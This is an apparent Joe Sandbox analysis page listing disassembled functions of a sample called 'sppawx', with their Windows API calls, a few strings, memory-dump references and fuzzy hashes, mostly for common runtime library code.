Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF79A335CB5

Part of subcall function 00007FF79A335608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33561C

Part of subcall function 00007FF79A32A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
Part of subcall function 00007FF79A32A9B8: GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8

Part of subcall function 00007FF79A32A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF79A32A94F,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32A979
Part of subcall function 00007FF79A32A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF79A32A94F,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32A99E

_get_daylight.LIBCMT ref: 00007FF79A335CA4

Part of subcall function 00007FF79A335668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33567C

_get_daylight.LIBCMT ref: 00007FF79A335F1A
_get_daylight.LIBCMT ref: 00007FF79A335F2B
_get_daylight.LIBCMT ref: 00007FF79A335F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79A33617C), ref: 00007FF79A335F63

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction ID: 3b484ac50d4e111ac76a3f2ab287e26252b5ff5c68401f3e8781e938fc4dcac7
Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction Fuzzy Hash: 63D1AD22E0E2428AFB30BF36D8511B9B6A1EF44784FC0917EEA4D47A95DF3CE4418760

Function 00007FF79A32A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF79A32A6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF79A32A715
RtlVirtualUnwind.KERNEL32 ref: 00007FF79A32A750
IsDebuggerPresent.KERNEL32 ref: 00007FF79A32A789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF79A32A793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF79A32A79E

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 7a3959de93039282e157ae04f5481e05272fd7b9dbb69084736715d6bd93dca3
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: 36315E32A19B8186EB60DF35E8442AEB3A4FB89754F94027EEA8D43B54DF3CC1458B10

Function 00007FF79A3318E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A331930
FindFirstFileExW.KERNEL32 ref: 00007FF79A331A3A

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction ID: b0ff41ac84198448cbcf2568e0ac2fe20c8b03adda14bb607e648aef98ac31ab
Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction Fuzzy Hash: B0B17F22F1E69642FE71AB7294001B9F291AB44BE4FC4517DEE5E07B99EF7CE4418320

Function 00007FF79A335EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF79A335F1A

Part of subcall function 00007FF79A335668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33567C

_get_daylight.LIBCMT ref: 00007FF79A335F2B

Part of subcall function 00007FF79A335608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33561C

_get_daylight.LIBCMT ref: 00007FF79A335F3C

Part of subcall function 00007FF79A335638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33564C

Part of subcall function 00007FF79A32A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
Part of subcall function 00007FF79A32A9B8: GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79A33617C), ref: 00007FF79A335F63

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction ID: 37bb2e31aadd618a36d41bc34ce82cdb919f596565e8e273e8dc3f1907308c56
Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction Fuzzy Hash: 15514E22E1E6428AF730FF36D8915A9F760AB48784FC5917DEA4D43A96DF3CE4408760

Function 00007FF79A31D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF79A31D0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF79A31D0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF79A31D0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF79A31D0D6

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: f2298fdaefd2b869abe530aa26f401fead0b331a83ba4b977d153f7c8e5205c0
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: E5115A22B19F058AFB10DF71E8492B973A4FB19758F840E39EA2D867A4DF3CD1548350

Function 00007FF79A333C80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF79A333CE6
memcpy_s.LIBCPMT ref: 00007FF79A333D11

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: 123891bb35a5043a73d4f4bae39de9fcd0dce573fc41bb07452d654f7afccbd9
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: 5BC1B072B1E68687EB349F2AA14466AF7A1FB94784FC5813DDB4A43744DE3DE8018B40

Function 00007FF79A31A4E4 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

header crc mismatch, xrefs: 00007FF79A31A991
unknown header flags set, xrefs: 00007FF79A31A535
, xrefs: 00007FF79A31A5CB

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction ID: f7982e9a5cfb01f3e96080ce20f953c74056099c203566f57c7cb480f83822fe
Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction Fuzzy Hash: 73F1A262E2A3D58BF7B5EF288088B3ABAE9EF44745F8541BCDA4947390CB38D541C750

Function 00007FF79A339798 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF79A3399E7
RaiseException.KERNEL32 ref: 00007FF79A3399F8

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction ID: 746b2c225121a0d354e2161c6a41a21042db9040ac88f6ffd5bcf293992360d1
Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction Fuzzy Hash: 06B19D73A09B88CBEB25CF39C8523687BA0F784B48F948969DA5D877A4CF39D451C710

Function 00007FF79A323A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF79A323B82
, xrefs: 00007FF79A323DC4

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction ID: 7ba648a3b57352b7bbf5ab70c2bd8d9cc64e9e57d51fc2e9226e6aa166344e10
Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction Fuzzy Hash: 25E1B336A0A64686FB78AF39805013DB3A0FF45B68F96427DDE4E07694DF39E841C720

Function 00007FF79A31A34B Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

incorrect header check, xrefs: 00007FF79A31A4CB
invalid window size, xrefs: 00007FF79A31A4B2

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction ID: 74b8cd71650ef5fa229b68ae02b52aca9bdfefe817b3b0350da7b629d90f4a87
Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction Fuzzy Hash: 2291A472A192C68BF7B5DE24C48CB3E7AA9FB44350F91417DDA4A46780DB3CE981CB10

Function 00007FF79A32DF60 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF79A32E0EA
e+000, xrefs: 00007FF79A32E06D

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction ID: 32264a5cccfb59c00f60e35f8d41169eef2c0c801e1b31ad50dee52f93849266
Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction Fuzzy Hash: 5E516862F192C586F7349A36D801769FB91E744B98F98C27DCFA847AC5CE3DE4418710

Function 00007FF79A330938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction ID: aa6dcd62ea32d6c893a36579479b3f0d05cd4f047e1729bbf039bad0182ea69e
Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction Fuzzy Hash: DC02AA21E1F64651FAB5BB36A40127DF690AF46BA0FC586BDED5D463D2DE3CA8408320

Function 00007FF79A32DACC Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF79A32DE0E

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: a21b5936b482aa6c6f2763f8e276a42cb8146c20d2e6f71870302f4882ee86d1
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 8AA13362A0A7C686FB31DF39A4107A9BB91EBA0BC4F44807ADE8D47785DE3DE501C710

Function 00007FF79A328804 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF79A328823

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction ID: 094177e68a05096e7993d357303e2917094f729b24121f6b2861882d7b06de05
Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction Fuzzy Hash: B1518C12F1A64642FA74BB37590117AF291AF85BC4FC846BDDE0E477D6EE3CE4028220

Function 00007FF79A3334F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF79A3334F4

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction ID: 70cde16c6354260bed8945666f812a85cefe6f91883204bfa7a877ddda293957
Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction Fuzzy Hash: D0B09220E0BA02C2FE193B35BC8621872A47F48700FD942BCC41C80330DE2C20E55720

Function 00007FF79A323610 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction ID: 747f82c16d7d13d055572ca166d67a16aa5b5f5154a87fb9a44916b9d1925431
Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction Fuzzy Hash: 03D1E366A0A64286FB78AE39805023DB7A0FF05B68F96427DCE4D07794CF3DE845C760

Function 00007FF79A319870 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction ID: cf12e50eed22c5d683bda6877ba805cba13f9fde779cc89651051e6216f04539
Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction Fuzzy Hash: 0AC1AD762181E08BE299EA29E4694BA73D1F78930DBD5406FEF8747685C63CA414DB20

Function 00007FF79A322C80 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction ID: fb418bd33a84f47e43e1c84d4d943e65590bae271d2ab7ee18078163d929cf38
Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction Fuzzy Hash: 7FB19932A0A78589FBB49F7A885022CBBA4E709B48FA4017ECE4E47395CF29D451D760

Function 00007FF79A32E5E0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
